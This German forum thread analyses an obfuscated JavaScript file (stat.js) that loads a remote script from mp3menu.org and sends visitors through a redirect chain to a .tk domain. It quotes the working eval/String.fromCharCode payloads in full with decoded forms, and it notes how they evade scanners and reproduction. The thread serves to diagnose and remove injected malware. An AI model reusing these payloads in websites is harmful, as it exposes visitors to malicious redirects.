Komische Umleitung durch externes Javascript

lookshe

Seit einigen Tagen passiert hier Komisches durch folgendes JavaScript (Auszug, per Forum dekodiert – nicht ausführen):
https://examhome.net/stat.js?v=1.0.3

Code:
// Obfuscated loader as served from https://examhome.net/stat.js?v=1.0.3 — quoted as
// evidence, do not execute. Two stages: the first eval() decodes to a Piwik/Matomo
// tracker bootstrap that loads piwik.js from examhome.innocraft.cloud; the second
// builds a string in mrGFvAlG that appends a <script src="https://mp3menu.org/mp3.js">
// to <head> and eval()s it. The char-code arrays are kept byte-for-byte so they can be
// matched against the live file; the decoded form is shown below.
eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 95, 112, 97, 113, 32, 61, 32, 95, 112, 97, 113, 32, 124, 124, 32, 91, 93, 59, 10, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 116, 114, 97, 99, 107, 80, 97, 103, 101, 86, 105, 101, 119, 39, 93, 41, 59, 10, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 101, 110, 97, 98, 108, 101, 76, 105, 110, 107, 84, 114, 97, 99, 107, 105, 110, 103, 39, 93, 41, 59, 10, 32, 32, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 117, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 105, 110, 110, 111, 99, 114, 97, 102, 116, 46, 99, 108, 111, 117, 100, 47, 34, 59, 10, 32, 32, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 115, 101, 116, 84, 114, 97, 99, 107, 101, 114, 85, 114, 108, 39, 44, 32, 117, 43, 39, 112, 105, 119, 105, 107, 46, 112, 104, 112, 39, 93, 41, 59, 10, 32, 32, 32, 32, 95, 112, 97, 113, 46, 112, 117, 115, 104, 40, 91, 39, 115, 101, 116, 83, 105, 116, 101, 73, 100, 39, 44, 32, 39, 49, 39, 93, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 44, 32, 103, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 44, 32, 115, 61, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 103, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 103, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 32, 103, 46, 100, 101, 102, 101, 114, 61, 116, 114, 117, 101, 59, 32, 103, 46, 115, 114, 99, 61, 117, 43, 39, 112, 105, 119, 105, 107, 46, 106, 115, 39, 59, 32, 115, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 103, 44, 115, 41, 
59, 10, 32, 32, 125, 41, 40, 41, 59, 10)); var mrGFvAlG = String.fromCharCode(118, 97, 114, 32, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 10, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 105, 109, 112, 108, 101, 108, 101, 109, 101, 110, 116, 41, 59); eval(mrGFvAlG);
// NOTE(review): the second stage is doubly indirect — String.fromCharCode builds a source
// string that itself contains another String.fromCharCode for the URL — so neither
// "mp3menu" nor "eval" of the final URL appears as plain text in stat.js. Grep-based
// scanners of the file will miss it; decode before judging.
Das Ganze wird dekodiert zu:

Code:
// Decoded form of the stat.js loader (forum reconstruction: the string literals span
// several lines here and would not parse as-is — read it as pseudo-code).
// Stage 1: an ordinary Piwik/Matomo tracker bootstrap. It queues trackPageView /
// enableLinkTracking on _paq, points the tracker at examhome.innocraft.cloud/piwik.php
// (site id 1) and inserts piwik.js before the first <script> on the page.
eval(
"   var _paq = _paq || [];
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u=\"https://examhome.innocraft.cloud/\";
    _paq.push(['setTrackerUrl', u+'piwik.php']);
    _paq.push(['setSiteId', '1']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);
  })();
");
// Stage 2: the actual payload. Builds a <script> element for https://mp3menu.org/mp3.js
// (URL hidden behind String.fromCharCode so it is not visible as plain text), appends it
// to <head>, and runs all of that via eval(). The cookie-gated redirect quoted in the
// follow-up post is presumably the contents of mp3.js.
var mrGFvAlG = "var simplelement = document.createElement('script'); 
simplelement.type = 'text/javascript'; 
simplelement.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 109, 112, 51, 46, 106, 115); // "https://mp3menu.org/mp3.js"
simplelement.async = true; 
document.getElementsByTagName(\"head\")[0].appendChild(simplelement);";
eval(mrGFvAlG);
Danach folgt eine kleine Umleitungsorgie über mehrere dubiose Seiten.
 

Chromatin

Der erste Teil sieht ja koscher aus (ein gewöhnliches Piwik/Matomo-Tracking-Snippet). Aber die URL im 2. eval (eval(mrGFvAlG)) lässt hier die Virenscanner aktiv werden. Hast du den JS-Code, der da geladen werden soll? eval ist aber schon fies im Allgemeinen ;)
 

lookshe

Code:
// Presumably the body of https://mp3menu.org/mp3.js, as fetched (quoted as evidence,
// do not execute). Again eval(String.fromCharCode(...)); decoded form follows below:
// an IIFE that sets an "mp3menu" cookie and redirects to https://mp3menu.org/red.php
// unless the cookie is already present.
eval(String.fromCharCode(40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 9, 9, 9, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 109, 112, 51, 109, 101, 110, 117, 61, 34, 41, 32, 62, 61, 32, 48, 41, 32, 123, 10, 10, 9, 9, 9, 125, 32, 101, 108, 115, 101, 32, 123, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 32, 61, 32, 110, 101, 119, 32, 68, 97, 116, 101, 40, 41, 59, 10, 9, 9, 9, 32, 32, 101, 120, 112, 105, 114, 121, 46, 115, 101, 116, 84, 105, 109, 101, 40, 101, 120, 112, 105, 114, 121, 46, 103, 101, 116, 84, 105, 109, 101, 40, 41, 43, 40, 49, 48, 42, 54, 48, 42, 49, 48, 48, 48, 42, 54, 42, 56, 41, 41, 59, 10, 9, 9, 9, 32, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 32, 61, 32, 34, 109, 112, 51, 109, 101, 110, 117, 61, 121, 101, 115, 59, 32, 101, 120, 112, 105, 114, 101, 115, 61, 34, 32, 43, 32, 101, 120, 112, 105, 114, 121, 46, 116, 111, 71, 77, 84, 83, 116, 114, 105, 110, 103, 40, 41, 59, 10, 9, 9, 9, 32, 32, 118, 97, 114, 32, 109, 112, 51, 109, 101, 110, 117, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 57, 44, 32, 49, 49, 50, 44, 32, 53, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 55, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 49, 50, 44, 32, 49, 48, 52, 44, 32, 49, 49, 50, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 109, 112, 51, 109, 101, 110, 117, 41, 59, 10, 9, 9, 9, 32, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 
111, 110, 46, 104, 114, 101, 102, 32, 61, 32, 109, 112, 51, 109, 101, 110, 117, 59, 10, 9, 9, 9, 125, 10, 32, 32, 125, 41, 40, 41, 59));
bzw. dekodiert:
Code:
// Decoded redirect stage (forum reconstruction; the \" escapes are left over from the
// enclosing string literal). Runs once per browser per cookie lifetime: if the
// "mp3menu" cookie is present nothing happens, otherwise the cookie is set and the
// top-level page is navigated to https://mp3menu.org/red.php.
(function() {
			// Cookie already set: stay silent. This gate is why the redirect is hard to
			// reproduce — a second visit within the cookie lifetime shows nothing odd.
			if (document.cookie.indexOf(\"mp3menu=\") >= 0) {

			} else {
			  // NOTE: `expiry` has no var/let — an implicit global, as written in the sample.
			  expiry = new Date();
			  // 10*60*1000*6*8 ms = 8 hours: the redirect fires at most once per 8 h per browser.
			  expiry.setTime(expiry.getTime()+(10*60*1000*6*8));
			  // Cookie is set without path/domain attributes.
			  document.cookie = \"mp3menu=yes; expires=\" + expiry.toGMTString();
			  // Target URL hidden via String.fromCharCode: "https://mp3menu.org/red.php".
			  var mp3menu = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 109, 112, 51, 109, 101, 110, 117, 46, 111, 114, 103, 47, 114, 101, 100, 46, 112, 104, 112); // "https://mp3menu.org/red.php"
			  // Two attempts at the same navigation: replace() first, then href= as a fallback.
			  window.location.replace(mp3menu);
			  window.location.href = mp3menu;
			}
  })();
Auf dieser Seite (red.php) steht dann im HTML-Header ein JavaScript, das die nächsten Weiterleitungen anstößt:
Code:
<!-- Inline redirect served by https://mp3menu.org/red.php (per the post above): the next hop
     goes to a .tk domain over plain http with a numeric query string; the final landing page
     is not shown here. Same replace()-then-href pattern as in mp3.js. -->
<script>window.location.replace("http://ygetygsdfertase.tk/index/?4831537102803");window.location.href = "http://ygetygsdfertase.tk/index/?4831537102803";</script>
Wobei ich allein schon den Aufruf von https://mp3menu.org/red.php auf diesem Weg (zweifach per String.fromCharCode versteckt und per eval ausgeführt) sehr fragwürdig finde und denke, dass die Einbindung von stat.js – wo auch immer sie herkommt – sofort entfernt werden sollte. Zum Nachvollziehen: Wegen des 8-Stunden-Cookies ("mp3menu=yes") sieht man die Umleitung pro Browser nur einmal; zum Reproduzieren also Cookie löschen oder ein frisches Profil nehmen.
 